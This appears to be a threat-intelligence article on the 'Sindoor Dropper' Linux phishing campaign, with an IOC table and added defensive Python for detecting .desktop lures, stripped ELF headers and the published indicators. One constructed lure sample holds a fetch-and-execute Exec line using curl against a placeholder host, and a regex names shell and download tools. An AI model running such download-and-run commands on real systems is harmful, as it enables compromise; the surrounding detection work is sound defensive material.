A new malware campaign, dubbed “Sindoor Dropper,” is targeting Linux systems using sophisticated spear-phishing techniques and a multi-stage infection chain.
The campaign leverages lures themed around the recent India-Pakistan conflict, known as Operation Sindoor, to entice victims into executing malicious files.
This activity’s standout feature is its reliance on weaponized .desktop files, a method previously associated with the advanced persistent threat (APT) group APT36, also known as Transparent Tribe or Mythic Leopard.
The attack begins when a user opens a malicious .desktop file, named “Note_Warfare_Ops_Sindoor.pdf.desktop,” which masquerades as a standard PDF document.
According to analysis by Nextron Systems, upon execution it opens a benign decoy PDF to maintain the illusion of legitimacy while silently initiating a complex, heavily obfuscated infection process in the background.

This process is designed to evade both static and dynamic analysis, with the initial payload reportedly having zero detections on VirusTotal at the time of its discovery.
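The lure described above is an ordinary Linux launcher file whose name and icon imitate a PDF while its Exec= line runs a shell. The following is an added defender's example, not Nextron's tooling or any code from the campaign: it parses .desktop files and flags the traits of a document lure (a document-style double extension, a Name that looks like a document, an Exec= line that launches a shell or download tool or stages files under /tmp, and a decoy viewer followed by further commands). Both sample files are constructed for the example; the staging host in the lure sample is a placeholder.

```python
"""Flag .desktop files that masquerade as documents (added example, not the campaign's or Nextron's code)."""
import configparser
import re

# Extensions a user expects to open as a document or image, not as a launcher.
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt", ".jpg", ".png")

# Exec= content that a document viewer entry has no reason to contain.
SUSPICIOUS_EXEC = re.compile(
    r"\b(bash|sh|zsh)\s+-c\b|\b(curl|wget)\b|\bbase64\b|\bchmod\s+\+?x\b|/tmp/|/dev/shm/",
    re.IGNORECASE,
)


def parse_desktop(text: str) -> dict:
    """Parse the [Desktop Entry] group of a .desktop file into a plain dict."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep key case: Exec, Name, Icon
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        return {}
    return dict(cp["Desktop Entry"])


def assess_desktop(filename: str, text: str) -> list:
    """Return the reasons this .desktop entry looks like a document lure (empty list if none)."""
    reasons = []
    lower = filename.lower()
    if lower.endswith(".desktop") and lower[: -len(".desktop")].endswith(DOC_EXTS):
        reasons.append("document-style double extension in filename")
    entry = parse_desktop(text)
    if entry.get("Name", "").lower().endswith(DOC_EXTS):
        reasons.append("Name field imitates a document")
    exec_line = entry.get("Exec", "")
    if SUSPICIOUS_EXEC.search(exec_line):
        reasons.append("Exec launches a shell/downloader or stages files in /tmp")
    if "xdg-open" in exec_line and (";" in exec_line or "&&" in exec_line):
        reasons.append("Exec opens a decoy and then runs further commands")
    return reasons


# Constructed samples (not the real campaign files): a normal launcher and a document lure.
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""

LURE = """[Desktop Entry]
Type=Application
Name=Note_Warfare_Ops_Sindoor.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "xdg-open /tmp/decoy.pdf; curl -s http://PLACEHOLDER-STAGING-HOST/x -o /tmp/x; chmod +x /tmp/x; /tmp/x"
"""


def scan(files: dict) -> dict:
    """Map filename -> reasons for every file that is flagged; clean files are omitted."""
    return {name: r for name, text in files.items() if (r := assess_desktop(name, text))}


if __name__ == "__main__":
    for name, reasons in scan({"editor.desktop": BENIGN, "Note_Warfare_Ops_Sindoor.pdf.desktop": LURE}).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

In a real deployment the same checks run over ~/Desktop, ~/Downloads and ~/.local/share/applications, where a user-dropped launcher would live; a hit on the double-extension rule alone is worth an alert, because no legitimate document carries a .desktop suffix.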
‘Sindoor Dropper’ Malware Targets Linux Systems
The .desktop file downloads several components, including an AES decryptor (mayuw) and an encrypted downloader (shjdfhd).
The decryptor, a Go binary packed with UPX, is intentionally corrupted by stripping its ELF magic bytes, likely to bypass security scans on platforms like Google Docs. The .desktop file restores these bytes on the victim’s machine to make the binary executable again.
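A file whose first four bytes have been cut off still carries the rest of a well-formed ELF header, which is what a scanner can key on. The following added example (not the campaign's code and not Nextron's) tests whether a blob would become a plausible ELF header if the 0x7f 'E' 'L' 'F' magic were put back in front of it: EI_CLASS and EI_DATA must be 1 or 2, EI_VERSION must be 1, the padding bytes must be zero, and e_type, e_machine and e_version must hold sane values. The sample header is constructed with struct.pack; no real binary is involved, and the machine list is an assumption covering common targets.

```python
"""Detect ELF binaries whose leading magic bytes were stripped (added example, not the campaign's code)."""
import struct

ELF_MAGIC = b"\x7fELF"
ET_TYPES = {1, 2, 3, 4}                           # ET_REL, ET_EXEC, ET_DYN, ET_CORE
COMMON_MACHINES = {0x03, 0x28, 0x3E, 0xB7, 0xF3}  # x86, ARM, x86-64, AArch64, RISC-V (assumed list)


def plausible_elf_header(hdr: bytes) -> bool:
    """True if hdr (at least 24 bytes) starts with a structurally valid e_ident, e_type, e_machine, e_version."""
    if len(hdr) < 24 or hdr[:4] != ELF_MAGIC:
        return False
    ei_class, ei_data, ei_version = hdr[4], hdr[5], hdr[6]
    if ei_class not in (1, 2) or ei_data not in (1, 2) or ei_version != 1:
        return False
    if any(hdr[9:16]):  # EI_PAD must be all zero
        return False
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine, e_version = struct.unpack(endian + "HHI", hdr[16:24])
    return e_type in ET_TYPES and e_machine in COMMON_MACHINES and e_version == 1


def classify(data: bytes) -> str:
    """'elf' for an intact ELF, 'headless-elf' if it only needs its magic restored, otherwise 'other'."""
    if plausible_elf_header(data[:24]):
        return "elf"
    if plausible_elf_header(ELF_MAGIC + data[:20]):
        return "headless-elf"
    return "other"


def make_sample_elf64_header() -> bytes:
    """Constructed 64-byte ELF64 little-endian x86-64 executable header (no code follows it)."""
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8
    return struct.pack(
        "<16sHHIQQQIHHHHHH",
        e_ident, 2, 0x3E, 1,      # e_type=EXEC, e_machine=x86-64, e_version=1
        0x401000, 64, 0, 0,       # e_entry, e_phoff, e_shoff, e_flags
        64, 56, 1, 64, 0, 0,      # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    )


if __name__ == "__main__":
    intact = make_sample_elf64_header()
    stripped = intact[4:]                 # what the dropper ships: everything after the magic
    pdf = b"%PDF-1.4\n" + b"\x00" * 60    # constructed non-ELF control
    for label, blob in (("intact", intact), ("stripped", stripped), ("pdf", pdf)):
        print(f"{label:9s} -> {classify(blob)}")
```

The check is cheap enough to run on every file written to a download or temp directory; a UPX-packed Go binary still has an intact ELF header, so packing does not change the outcome, only the missing magic does.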
This kicks off a multi-stage process where each component decrypts and runs the next. The chain includes basic anti-virtual machine checks, such as verifying board and vendor names, blacklisting specific MAC address prefixes, and checking machine uptime.
All strings within the droppers are obfuscated using a combination of Base64 encoding and DES-CBC encryption to further hinder analysis.
The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command-and-control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance at wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx.
This gives the attacker full remote access to the compromised system, enabling them to monitor user activity, move laterally across the network, and exfiltrate sensitive data, Nextron said.
The Sindoor Dropper campaign highlights an evolution in threat actor tradecraft, demonstrating a clear focus on Linux environments, which phishing campaigns have historically targeted less often.
IOCs for Sindoor Dropper
| IOC Type | Indicator | Description |
|---|---|---|
| File Hash | 9943bdf1b2a37434054b14a1a56a8e67aaa6a8b733ca785017d3ed8c1173ac59 | Initial phishing payload (Note_Warfare_Ops_Sindoor.pdf.desktop) |
| File Hash | 9a1adb50bb08f5a28160802c8f315749b15c9009f25aa6718c7752471db3bb4b | Decrypted AES decryptor (mayuw) |
| File Hash | 0f4ef1da435d5d64ccc21b4c2a6967b240c2928b297086878b3dcb3e9c87aa23 | Stage 2 downloader (shjdfhd) |
| File Hash | 38b6b93a536cbab5c289fe542656d8817d7c1217ad75c7f367b15c65d96a21d4 | Stage 3 downloader (inter_ddns) and the decrypted MeshAgent payload (server2) |
| File Hash | 05b468fc24c93885cad40ff9ecb50594faa6c2c590e75c88a5e5f54a8b696ac8 | MeshAgent final payload (server2) |
| File Hash | ba5b485552ab775ce3116d9d5fa17f88452c1ae60118902e7f669fd6390eae97 | Decoy PDF document (/tmp/Note_Warfare.pdf) |
| Filename | Note_Warfare_Ops_Sindoor.pdf.desktop | The initial weaponized .desktop file used for phishing |
| Filename | /tmp/Note_Warfare.pdf | The benign decoy document displayed to the victim |
| Filename | mayuw | AES decryptor payload |
| Filename | shjdfhd | Encrypted Stage 2 downloader |
| Filename | access | AES decryptor for the next stage |
| Filename | inter_ddns | Stage 3 downloader |
| Filename | server2 | The final MeshAgent payload |
| Network | wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx | Command-and-control (C2) server URL for the MeshAgent payload |
| Network | indianbosssystems.ddns[.]net | Malicious C2 domain |
| Network | 54.144.107[.]42 | IP address of the C2 server, hosted on AWS |
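To put the table to work, the indicators have to be refanged ([.] back to .) and matched in the way each type warrants: hashes as exact tokens, the C2 domain as a suffix so that the wss:// host above and any other subdomain both hit, the IP as an exact dotted quad, and filenames only as the basename of a path. The following is an added example, not Nextron's tooling; the indicators are the ones published above, the log lines are constructed for the example, and the generic names access and server2 are deliberately matched only as path basenames because on their own they would flood a SOC with false positives.

```python
"""Match the published Sindoor Dropper indicators against log lines (added example, not Nextron's tooling)."""
import re

# Indicators copied from the IOC table above (hash -> description, etc.).
IOCS = {
    "sha256": {
        "9943bdf1b2a37434054b14a1a56a8e67aaa6a8b733ca785017d3ed8c1173ac59": "Note_Warfare_Ops_Sindoor.pdf.desktop",
        "9a1adb50bb08f5a28160802c8f315749b15c9009f25aa6718c7752471db3bb4b": "AES decryptor (mayuw)",
        "0f4ef1da435d5d64ccc21b4c2a6967b240c2928b297086878b3dcb3e9c87aa23": "Stage 2 downloader (shjdfhd)",
        "38b6b93a536cbab5c289fe542656d8817d7c1217ad75c7f367b15c65d96a21d4": "Stage 3 downloader (inter_ddns)",
        "05b468fc24c93885cad40ff9ecb50594faa6c2c590e75c88a5e5f54a8b696ac8": "MeshAgent payload (server2)",
        "ba5b485552ab775ce3116d9d5fa17f88452c1ae60118902e7f669fd6390eae97": "Decoy PDF (/tmp/Note_Warfare.pdf)",
    },
    "domain": {"indianbosssystems.ddns[.]net": "Malicious C2 domain"},
    "ip": {"54.144.107[.]42": "C2 server IP (AWS)"},
    # Generic names such as access/server2 are weak on their own; we only match them as path basenames.
    "filename": {
        "Note_Warfare_Ops_Sindoor.pdf.desktop": "weaponized .desktop lure",
        "Note_Warfare.pdf": "decoy PDF",
        "mayuw": "AES decryptor",
        "shjdfhd": "encrypted stage 2 downloader",
        "access": "AES decryptor for next stage",
        "inter_ddns": "stage 3 downloader",
        "server2": "MeshAgent payload",
    },
}

TOKEN_SPLIT = re.compile(r"""[\s,;"'()=]+""")
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('[.]') back into its matchable form."""
    return indicator.replace("[.]", ".")


def match_line(line: str) -> list:
    """Return (type, indicator, description) tuples for every indicator present in one log line."""
    hits = []
    tokens = [t for t in TOKEN_SPLIT.split(line) if t]
    for tok in tokens:
        if tok.lower() in IOCS["sha256"]:
            hits.append(("sha256", tok.lower(), IOCS["sha256"][tok.lower()]))
        if "/" in tok:  # treat as a path; match only its basename
            base = tok.rsplit("/", 1)[-1]
            if base in IOCS["filename"]:
                hits.append(("filename", base, IOCS["filename"][base]))
    for host in HOST_RE.findall(line.lower()):
        for dom, desc in IOCS["domain"].items():
            d = refang(dom)
            if host == d or host.endswith("." + d):
                hits.append(("domain", host, desc))
    for ip in IP_RE.findall(line):
        for ioc, desc in IOCS["ip"].items():
            if ip == refang(ioc):
                hits.append(("ip", ip, desc))
    return hits


def scan_logs(lines: list) -> list:
    """Flat list of (line_no, type, indicator, description) across all lines, 1-based line numbers."""
    return [(n, *hit) for n, line in enumerate(lines, 1) for hit in match_line(line)]


# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    "2025-09-01T10:12:03Z host1 dns query=boss-servers.gov.in.indianbosssystems.ddns.net type=A answer=54.144.107.42",
    "2025-09-01T10:12:05Z host1 exec path=/home/user/Downloads/Note_Warfare_Ops_Sindoor.pdf.desktop "
    "sha256=9943bdf1b2a37434054b14a1a56a8e67aaa6a8b733ca785017d3ed8c1173ac59",
    "2025-09-01T10:12:09Z host1 exec path=/usr/bin/gedit sha256=0000000000000000000000000000000000000000000000000000000000000000",
]

if __name__ == "__main__":
    for line_no, kind, indicator, desc in scan_logs(SAMPLE_LOG):
        print(f"line {line_no}: {kind:8s} {indicator}  ({desc})")
```

Suffix matching on the domain is what makes the DNS line hit even though the query is for a long subdomain of the published domain; an exact-match blocklist would miss it.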
By combining timely, region-specific social engineering with advanced evasion techniques, the attackers increase their likelihood of successfully compromising sensitive networks.